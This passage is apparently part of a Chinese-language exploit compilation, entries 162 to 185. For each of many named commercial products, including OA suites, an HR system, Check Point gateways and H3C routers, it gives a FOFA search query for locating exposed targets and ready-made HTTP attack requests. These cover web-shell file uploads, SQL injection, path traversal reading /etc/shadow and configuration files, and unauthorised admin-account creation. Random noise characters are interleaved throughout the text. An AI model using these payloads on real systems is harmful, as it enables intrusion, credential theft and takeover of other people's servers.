<fileName>../../../../dizxdell.aspx</fileName>, n# R" ^9 o/ E
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>3 f2 u" p4 T0 a$ e3 n
<tag>3</tag>1 X% |5 [4 K% c1 i
</UploadResume>$ Z$ @3 y) U" o: }2 T; I( U
</soap:Body># X) ]" c: r: _& U: t9 {
</soap:Envelope>
! A* I6 I) u- p6 V6 W+ C' f( @7 m. M/ _+ g$ Y6 Z4 ^/ }! P
1 i- w/ A; [: Z3 _/ _( k
http://x.x.x.x/dizxdell.aspx
* R$ V6 c! B# @0 k9 I: A7 {5 J: Y, o
. m e* K Z" u+ i9 r162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
, X% k. i# v7 `- y3 jFOFA: app="和丰山海-数字标牌"
* l' T. x+ M: v; rPOST /QH.aspx HTTP/1.1
' f$ s- a+ g3 O- `* ?& D/ Q: }Host: x.x.x.x8 l" z# U" {3 n0 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0& C9 ^' F# k: l. y' ]
Connection: close
0 r. j3 h! x- ?4 t' TContent-Length: 5838 b8 I$ P2 |4 M" @$ L# X w( I6 x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
" b$ W( y$ G' {! J# m+ r6 dAccept-Encoding: gzip
( \' k; d/ k5 j6 k! G( |/ B6 X! ~! ^2 r
------WebKitFormBoundaryeegvclmyurlotuey, p7 H3 C$ ?: ]9 p* L1 r& P( d
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
8 e$ w* o B: p2 oContent-Type: application/octet-stream( n% L4 {' ^6 h3 U; o3 h
- a8 u& {( c" m8 L, h: y M4 Z<% response.write("ujidwqfuuqjalgkvrpqy") %>! w8 ]6 T! F0 y, z# ~' ?# }
------WebKitFormBoundaryeegvclmyurlotuey
( U9 t6 ~ K3 E. ]Content-Disposition: form-data; name="action") x1 K9 T; J7 G! t% U
& c: F o" O5 r! f0 S, Z
upload
. I. ]6 z$ x) ~; X------WebKitFormBoundaryeegvclmyurlotuey
- K4 z4 a# D) eContent-Disposition: form-data; name="responderId"9 X7 y! x3 K4 k) l+ @7 _* i
* F7 S6 u: Y e" w2 I
ResourceNewResponder
7 U- y$ a+ ~7 T3 k------WebKitFormBoundaryeegvclmyurlotuey4 U/ T& i3 K; X
Content-Disposition: form-data; name="remotePath") ?3 m8 T' p$ t8 ?
' O& E; c" `& Y! @
/opt/resources0 r5 Y- U' @$ a: w2 {2 Y S
------WebKitFormBoundaryeegvclmyurlotuey--* W" B/ U" P1 }, _- {% ~$ S! w
5 O+ h8 m% f7 X+ E* `; n
* b/ O- h3 `2 K: u
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
/ m4 o: c! u1 c- ~, H8 C5 Y7 G+ g# S0 m( U2 K* v
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
! ^7 d+ i$ H" w8 v( `FOFA: icon_hash="-795291075"! L5 \+ X' ^4 Y) u+ c0 `
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.16 \) d# z* A9 L, l; i
Host: x.x.x.x$ H- m5 D6 ~$ m4 ?1 k" H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 L( S+ y3 x3 K
Connection: close
, J& u% _2 D, p1 S" E- c( g$ b8 oContent-Length: 293
9 @4 y! H6 U0 @Accept: */*# w+ u [. k# i! _( V1 `7 n( ~+ Z
Accept-Encoding: gzip, deflate: r* k8 _9 f5 n; S1 w& j' |1 r
Accept-Language: zh-CN,zh;q=0.9 G& c( Y9 v! U
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod0 ]7 t L4 l. o7 ^
9 F" r9 R, s, Q" r. f" b+ p
------iiqvnofupvhdyrcoqyuujyetjvqgocod. G( ?. f5 X. R% a) G9 K
Content-Disposition: form-data; name="name"- P4 h2 r2 r9 s K0 I+ L
- k/ O$ H0 ~9 |1 \6 ?. T t; _9 T1.php% o- N5 H3 a+ V- q0 l% B% p
------iiqvnofupvhdyrcoqyuujyetjvqgocod+ M N- O$ C/ ^5 A
Content-Disposition: form-data; name="upfile"; filename="1.php"* x/ n! Q; T3 ]# b0 y
Content-Type: image/jpeg
6 Q4 I" P( `! L; X
! v/ w+ o$ n5 wrvjhvbhwwuooyiioxega* z7 L. P( }9 ]% p; a% {2 w+ u" d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--% A$ x0 M- @$ K9 |/ q7 W
9 E- T6 F) `1 ^/ u: ?% Z- P/ Z9 G5 `7 |/ |( B+ S, G9 f- `
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传% ^: T3 l* ~% g5 e" @3 X
FOFA: title="智慧综合管理平台登入"
5 b; n4 c9 V- b. M7 b3 g8 N, i9 q" P, w( \POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
% [3 D0 X" M9 s- jHost: x.x.x.x
1 @/ {' n) f! E. MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- C8 ~0 `- r0 p h( RContent-Length: 288
" A l2 H" h$ r6 r- s1 T9 `* ~Accept: application/json, text/javascript, */*; q=0.01
9 p. \6 ]# R! A, b% mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,! a' c n. n+ O6 A5 i
Connection: close$ m4 d5 B7 L3 h" k( l; I0 j
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
3 p( \9 K6 p" Q% AX-Requested-With: XMLHttpRequest9 ~% m! G; y5 G4 E1 |# R0 _
Accept-Encoding: gzip
/ `3 b% i! z) s0 h- \, J- H* u
1 n4 b4 W& [4 k------dqdaieopnozbkapjacdbdthlvtlyl
, O9 H( d9 e- E: R0 {$ JContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
1 i' M+ G' k; c/ cContent-Type: image/jpeg
m! E2 G7 q0 K/ L( l) B( T ^& }% y0 v0 c
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>1 r0 h/ [9 ]/ u; C* n
------dqdaieopnozbkapjacdbdthlvtlyl--
2 c" p& ?5 O! X3 Q2 m
- [4 S5 g0 t1 J6 g, S% `, b( X/ q
3 D( O( b0 _( B7 t* ^http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx9 P% D4 L/ y) [, t
+ C7 F/ w i# o% b8 q
165. OrangeHRM 3.3.3 SQL 注入
: S. _4 d( F4 J) d D( ^$ g* rCVE-2024-364289 d- b' Y) l+ v/ M5 f
FOFA: app="OrangeHRM-产品"5 Z l6 ]8 ?) `* S: j. P' a
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
( W" D" L5 ]9 {: g2 k! Q4 u) d( @
4 ?( z3 o( N9 V& h" c T- @: k: }. g) r* u2 ]
166. 中成科信票务管理平台SeatMapHandler SQL注入) y$ B4 r/ z2 H
FOFA:body="技术支持:北京中成科信科技发展有限公司"0 y! y4 g1 g/ I( y; k$ V. ~
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
" [1 h% F6 |/ Z# _$ S5 I* r7 O$ AHost:
6 c: Z" l7 l9 V5 h0 k; n9 SPragma: no-cache
3 O" s& a3 S0 ]' i+ pCache-Control: no-cache) U5 e* ^- r7 C' k* o3 B8 N
Upgrade-Insecure-Requests: 14 T3 D3 c% U4 l6 P; M5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
* `+ }% A8 P% L8 R' \: VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 T: p0 m! ^$ O9 p
Accept-Encoding: gzip, deflate
1 n" f) N7 }8 _0 T3 Z' h$ EAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
% O) T% B2 c) {1 \$ y7 `0 X7 Z z' xCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE1 a; T w [8 Y: n! f) V
Connection: close
- ]. l6 Y" x6 _+ q4 u" yContent-Type: application/x-www-form-urlencoded" j6 u' K6 _. `% ^. {% d
Content-Length: 89, f1 K& B' ^2 d7 K5 U$ R8 t
; L& D y# W( P0 n1 |Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
2 m+ H2 _6 l, K1 Q9 W' y7 @$ ]% ~# o' s) r+ ^& ~) \2 X6 y, ~
4 i# D8 f6 _. q8 f& @0 e1 M& j
167. 精益价值管理系统 DownLoad.aspx任意文件读取
3 b; C+ o! j( G- F9 h3 Q' f) MFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
. n# h6 F+ g$ |GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
5 e1 y4 ~! m6 [8 WHost:
# \6 v2 D/ x8 `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ Q6 Q" ^: e. h$ t0 E$ m- [7 pContent-Type: application/x-www-form-urlencoded
3 @0 C* M" L( R- yAccept-Encoding: gzip, deflate
; C$ V0 g i1 p+ A; dAccept: */*
! g3 T" B1 j1 p1 jConnection: keep-alive2 [& S3 P* }/ l' y# [. h9 }, d* n
* f/ y& x- Y8 ^. G S' y5 B% r" h# X! Z
168. 宏景EHR OutputCode 任意文件读取
- A% H$ e; D6 W, |' \# L7 G& qFOFA:app="HJSOFT-HCM"
" O" x7 w- J8 I+ D: j1 ?* ^9 lGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
0 }: m+ v. k/ N% f9 @5 S5 XHost: your-ip
9 r8 e6 C- E! j3 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36. b- K3 ^4 F. O# a
Content-Type: application/x-www-form-urlencoded$ `' b4 B3 E4 q
Connection: close: p1 S* a$ A) ]- N4 X
( H& R6 |& `8 Q7 o
' ~5 p6 s" H, p
7 r& L% q- J7 o169. 宏景EHR downlawbase SQL注入0 ]; t8 L p( v7 w9 F) P8 Y. J8 U
FOFA:app="HJSOFT-HCM"
' E" W/ B0 a6 sGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1& }9 \4 y1 q) P
Host: your-ip
! Q4 l: ?& u4 ^: A7 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- U2 m7 g3 ? L0 j: J3 SAccept: */*
$ X7 _: A4 F9 s5 F$ {- A! yAccept-Encoding: gzip, deflate
8 _. \* K1 D8 a+ t: LConnection: close
" a/ ]. q' ~* s$ L8 B
$ }% }% P" j0 d3 y% @& p0 x! ]* s9 @* h; \0 P U3 K, v# @
# G3 r1 C( Q! K R, x6 x
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
7 E; n/ N. h' T1 R1 V$ oFOFA:body="/general/sys/hjaxmanage.js"
0 }5 a; }6 {: A9 ~POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
! s! G8 b$ V1 j a2 VHost: balalanengliang; l# {- Y$ Q. K" o: T0 S
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 k4 g$ m2 b9 l/ V
Content-Type: application/x-www-form-urlencoded5 s0 N; J, f& L; ~7 f
) z% G- Q4 ^' ]% ], Dfilename=../webapps/ROOT/WEB-INF/web.xml- q1 V/ Q' I+ Y2 t4 K2 w7 q
5 M% e' x4 n/ C! ?) g8 y4 @
; Z) j1 C+ X5 r% S Z171. 通天星CMSV6车载定位监控平台 SQL注入
& a2 |' u/ p8 o! B! TFOFA:body="/808gps/"
. O8 ?5 @4 {4 \( o0 k' UGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1( y$ ?: G; a+ J
Host: your-ip1 a3 _' L k9 @# b% x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
" ^5 [( x& M; x" Q3 QAccept: */*+ `# p" D- S$ Y3 n0 }7 I$ `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 o% h4 _( V1 c/ z" v4 O; pAccept-Encoding: gzip, deflate- p8 f! U8 L# A& q: m: ?7 d( ^
Connection: close
. Q% ?. n+ ~! b: A& D- g6 b7 ^5 M7 x) _
$ y% t0 ~1 L, o( O
' J2 D: s% c. d( S5 q: Y. B172. DT-高清车牌识别摄像机任意文件读取8 X; D* v+ A+ _
FOFA:app="DT-高清车牌识别摄像机"2 t% {1 T4 I; t* X& X
GET /../../../../etc/passwd HTTP/1.1/ R2 M) D( t. N+ n
Host: your-ip
! R1 g: W: G1 {3 ]5 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" `! u; F+ m* Q6 r, n% L6 h
Accept-Encoding: gzip, deflate
8 K( I/ F2 K+ m4 hAccept: */*8 Z% X6 x( |9 a4 |
Connection: keep-alive# b5 J3 p9 \. M# l+ G; J6 h
) `, r* [8 u- F: g* p0 e
$ h$ ?( ]# b, ]2 i5 P" h3 |2 P) W' s/ Z1 [. s% ^7 n7 U
173. Check Point 安全网关任意文件读取( C0 H5 T6 B4 k! {* r
CVE-2024-24919
- t V. }6 c) [8 g% ~% b0 d1 M" [FOFA:app="Check_Point-SSL-Network-Extender"
* p+ b: j7 l$ ^, @- e8 vPOST /clients/MyCRL HTTP/1.17 ]* P, A) z% z8 j
Host: your-ip9 P8 ` e$ O$ F% B6 H
Content-Type: application/x-www-form-urlencoded2 ^+ @4 v c9 E9 g4 R
. d% ~' X) s) a2 [ V3 ~
aCSHELL/../../../../../../../etc/shadow
8 N+ V) b1 J$ z1 |% i0 A3 f
% K3 U2 Q& S. g" A
" w( |$ J% {8 m1 H9 _6 @7 F
# J8 K6 n8 G/ c0 J% k174. 金和OA C6 FileDownLoad.aspx 任意文件读取
' t9 ~# m: P; c+ P$ K' g- X3 v! uFOFA:app="金和网络-金和OA"
( F) D* \- W- b/ i) [) U& vGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1( e/ Z: T' n9 u9 E
Host: your-ip
4 c' g/ w. D; a7 [% p8 e. wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' e0 }5 d. e: M1 A6 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ Q" F6 g& f& N3 A# s, rAccept-Encoding: gzip, deflate, br
% ^' L0 i& J, M- D. u) O- EAccept-Language: zh-CN,zh;q=0.9
' S3 |# m+ W5 S N/ b2 vConnection: close
# q9 V$ t7 x# z% c0 s/ L
9 |( V2 j0 \. M1 o. z; B2 b( R( j/ @
( o+ Z& D9 i8 G$ B$ v2 j1 J175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
. D4 O7 c' s% c! e, W3 T% }FOFA:app="金和网络-金和OA": e: c5 @$ K8 @1 z$ I O# v# Y8 A
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
7 \ K/ R' x% _- O( E/ FHost:/ [+ k8 Z' u5 H* i
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36) p: @$ I# u6 C' J. q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 w1 p1 x2 S# W' g3 V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 F6 e! `7 v( D: R
Accept-Encoding: gzip, deflate& [- j2 h# u% u. b- r
Connection: close
( u. S/ K( U0 B0 w3 A' b# zUpgrade-Insecure-Requests: 1+ S& S+ O6 G. V/ ^+ ~2 {
7 l/ U4 e" b: w X
6 M7 U( M+ q4 J% _
176. 电信网关配置管理系统 rewrite.php 文件上传
5 u% y: `6 e, XFOFA:body="img/login_bg3.png" && body="系统登录"# d$ R6 }6 C& u+ V
POST /manager/teletext/material/rewrite.php HTTP/1.1
3 P6 F: O8 H2 {0 u3 }; v) cHost: your-ip, a7 o2 g @$ o. U3 w1 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
) L+ d9 D5 `2 G8 a( h4 J9 s+ cContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT6 Q. \+ j* }2 J" ^5 K
Connection: close. h) J) u+ o$ v# Z* @- U
4 Z0 S: m( R; d------WebKitFormBoundaryOKldnDPT5 N/ q' N% X7 v
Content-Disposition: form-data; name="tmp_name"; filename="test.php" h- W+ @. Q0 @. }) V" m& C
Content-Type: image/png
# d1 N2 h$ q, I ' ?5 }7 W. ^1 `+ G
<?php system("cat /etc/passwd");unlink(__FILE__);?>2 }0 n. B) e5 d: p, v+ T
------WebKitFormBoundaryOKldnDPT
2 u( o* r" |, t7 zContent-Disposition: form-data; name="uploadtime" I, n% S) L+ d1 s0 W
, i' z& m8 Q' S- T/ {/ m. q
- x! c9 D5 e1 R* y' ]. e
------WebKitFormBoundaryOKldnDPT--
3 I. O9 {& v' L y" D' ]1 ?
4 n$ o1 e+ n+ h, h3 S+ V
4 c& x0 p `' r. C7 L }, b0 S9 n3 @: ?0 f" B7 v* W
177. H3C路由器敏感信息泄露# C3 l2 Y: C7 T+ i
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg: P V: M6 V3 h) @4 L* }1 k4 r
/userLogin.asp/../actionpolicy_status/../M60.cfg
! }2 }+ p/ P0 }8 O* d# f/userLogin.asp/../actionpolicy_status/../GR8300.cfg
5 C2 F( u7 P, L9 g" [/userLogin.asp/../actionpolicy_status/../GR5200.cfg
4 |, x: {- G9 v/userLogin.asp/../actionpolicy_status/../GR3200.cfg$ J- f, C7 _* S- l
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
: D5 b/ w; ^+ d/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg7 a7 T9 D0 P& S$ f( V8 s
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ J0 q: y% X0 V0 s
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg3 f. k0 s) }. L1 e) J. O& f
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg, Z" b: T- E7 C& N/ \
/userLogin.asp/../actionpolicy_status/../ER5200.cfg, c( Z1 F: \$ b/ y& [) N
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
; V5 z) X5 K$ V* l" F* ]/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg" \7 Z3 t- U5 d* X
/userLogin.asp/../actionpolicy_status/../ER3260.cfg' J( O+ \- j. }) [1 W
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
6 y N, `0 g4 [- Q1 m/userLogin.asp/../actionpolicy_status/../ER3200.cfg
( N6 ~5 F9 U2 v& g1 n( u& S' v/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg% C: Y& l! \' f9 a0 _6 a6 h. t, D
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg, r6 o1 L3 K' g7 C' |8 S2 l5 b$ D
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg/ l& L8 [+ D2 ]8 n0 @& _! N
/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 _5 S @$ e9 ^- t+ d
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
% G# Q' h+ f1 I2 C- U( K
# f( y: j' P$ l4 Y* i0 ~9 Z
1 }2 b+ t6 `( a$ M7 [178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, s( v5 Z r' W5 g3 p( h+ x% } nFOFA:header="/selfservice"
D2 {6 L9 j& `/ j# o% j- ^POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1; J7 v1 m3 Q6 c! E0 @) P7 D2 W
Host:
( E# `. [& U0 C' p0 d. R- e* `* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36* K* E# z$ b/ ]. f
Content-Length: 252' \1 q/ N9 a/ V" z! Q, i
Accept-Encoding: gzip, deflate
: X( a! o3 { n8 wConnection: close+ E5 o% `- U; ~+ d8 U, G
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
# a* }. r; ]( s4 m d-----------------aqutkea7vvanpqy3rh2l
7 ^ V3 c; s { H0 [( wContent-Disposition: form-data; name="12234.txt"; filename="12234"4 X: h2 J0 K3 z# M
Content-Type: application/octet-stream, g' G7 V4 S3 k6 W6 J
Content-Length: 255( u1 U( C* C2 C, N& [0 P& A! r
q6 K% X& O0 A) `- R- y! @
122341 i; w! K m1 O# j6 i9 w" w
-----------------aqutkea7vvanpqy3rh2l--' U: T$ j `+ ^0 m
8 N. R7 x7 b2 n4 A( |2 V4 s
8 R5 F; X5 y# T$ X3 FGET /imc/primepush/%2e%2e/flex/12234.txt4 K& Z. o) z4 U5 T6 q) y& l
" P* ]- F$ j0 T9 Z5 W1 K
' J9 w) V8 t* q4 Q4 |( i& c$ |
179. 建文工程管理系统存在任意文件读取
; |% E" h C1 r% aPOST /Common/DownLoad2.aspx HTTP/1.1
" E2 z Y1 P; d- {: L2 S: GHost: {{Hostname}}
( c3 E5 W9 I& u0 O8 e& MContent-Type: application/x-www-form-urlencoded7 Z) |* K4 P. i& E" `
User-Agent: Mozilla/5.0
' B( h+ p, z& _4 ]( O
- w& d* a/ P% ^path=../log4net.config&Name=' V( T1 u8 w2 }7 k6 S5 K
o) S! B, `, A- C# e9 R! B
& ]3 X _5 d9 A1 P V( Q
180. 帮管客 CRM jiliyu SQL注入. p) Q% u j' o2 F% s/ L5 ^
FOFA:app="帮管客-CRM"6 W" ]$ u! z" S8 M7 y9 R& _: J7 Q
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
& {0 R5 L, j/ L- o/ N1 I* S4 L, MHost: your-ip* ^4 y+ ?, K2 ^. D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" X. }$ f% I3 R/ g; l0 f; sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# x0 n; M. K/ s E6 sAccept-Encoding: gzip, deflate5 B/ V: p2 Y4 v) r6 f
Accept-Language: zh-CN,zh;q=0.91 U$ |" y" {1 Q7 |, @% r7 I) q
Connection: close
+ K0 l/ }7 ]* g! u* S# K0 K% }' M- d. H
; x# y+ V7 Q% [0 q! U181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
: m6 |" O8 \5 Y* ^: B" aFOFA:"PDCA/js/_publicCom.js"
9 n3 J5 n) e8 M+ {, I1 vPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
( ~8 q( R7 H" c$ u6 w5 K- o" d5 v$ |Host: your-ip
7 h( O" T' u1 q) uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
! v# S* Y4 p9 \2 I9 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) x# K' |. N) D
Accept-Encoding: gzip, deflate, br
. J* p& G( g: Y2 rAccept-Language: zh-CN,zh;q=0.9# P, s- w8 H1 W5 O6 H0 p/ `$ D
Connection: close$ v6 ~* `( i- U8 s
Content-Type: application/x-www-form-urlencoded
, i2 @: J, O; o4 d8 W: y
{8 Y5 |2 I; B9 [* Q
& w0 A- X) d7 f- s; W% `, jaction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
; L) j& O3 x, n* z! g, t
/ P5 z4 Y) t u0 Q0 i7 M: y
: W3 X q* R* @8 x& m- N3 J182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建' W" K# f) h, M p3 I
FOFA:"PDCA/js/_publicCom.js"
6 l, H1 k& _3 G' g5 V+ Q7 D( ZPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1: d% H8 Q% O0 B+ [+ D& l+ W
Host: your-ip
, Y- v6 ^/ v7 ]+ Z; o4 [ Y5 k9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 o. b% b; D) x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; A" W# |; C$ Z* x }7 a
Accept-Encoding: gzip, deflate, br
: e/ c! T, k+ K1 s I& cAccept-Language: zh-CN,zh;q=0.9
2 A5 v: P: g: q" l0 DConnection: close* c; v6 |, j2 [5 ^9 z. s
Content-Type: application/x-www-form-urlencoded5 w- a/ x( }# Z: l/ P& A
! v5 T# |- G/ S8 o& L" d. Z& `: m/ z& f. m5 o+ W$ W
username=test1234&pwd=test1234&savedays=1
% s# ]2 Y4 Q; _7 U4 X: t7 O9 T
+ k/ e* e' H; E- n9 ~ p, p1 g4 c3 S1 P' N# G& J
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
; j3 Q# Y, f; F% r: gFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
- u) [. x& Q' g7 rGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1: i$ ?) ]. F _8 ^. h
Host: your-ip
$ p0 g( T: Y+ f/ v3 e+ \ uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
& I0 c& c! u: V8 S( \! O! lAccept-Charset: utf-8* B9 K: |+ C: y, ^$ W) n' | }
Accept-Encoding: gzip, deflate
+ z# Y' F' o6 ^) \Connection: close9 {. B6 B! S) T; z
) ^5 W5 M' r }; D
5 L% |6 m' m7 G184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加: m" P- t% x( y8 v4 Q2 B
FOFA:server="SunFull-Webs"
: }0 ]3 ~3 F7 p* t% h1 cPOST /soap/AddUser HTTP/1.17 r! |* a8 g0 n+ d8 P' ?# l6 S0 Z9 G4 e
Host: your-ip
' D0 V+ a8 l, L) tAccept-Encoding: gzip, deflate; z) Q, m% B4 l/ X1 o5 a6 O' i4 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0$ T2 C. u" c$ C- r- g
Accept: application/xml, text/xml, */*; q=0.01
% G2 T8 [; x8 }. D T$ O9 EContent-Type: text/xml; charset=utf-8
- V" t$ Q! V$ U; s' a$ Y" C; kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' ~3 y, u7 }: s: c: k' J/ W1 }X-Requested-With: XMLHttpRequest
3 r4 _0 m( C/ w9 l6 d" X; x/ ^: w! c* Y; L% u
% `1 D8 f/ X8 k9 L2 i% {
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
: V, c, w0 a1 ]3 i, L& K- V( q! [+ u# o5 R( \) k
. F- a" \. y9 [* s* L
185. 瑞友天翼应用虚拟化系统SQL注入% F4 Y& X4 H. t6 u
version < 7.0.5.11 w8 g; m3 H- z$ ^7 ^! M$ {
FOFA:app="REALOR-天翼应用虚拟化系统"* _# ?7 Z' [0 c9 I5 Q
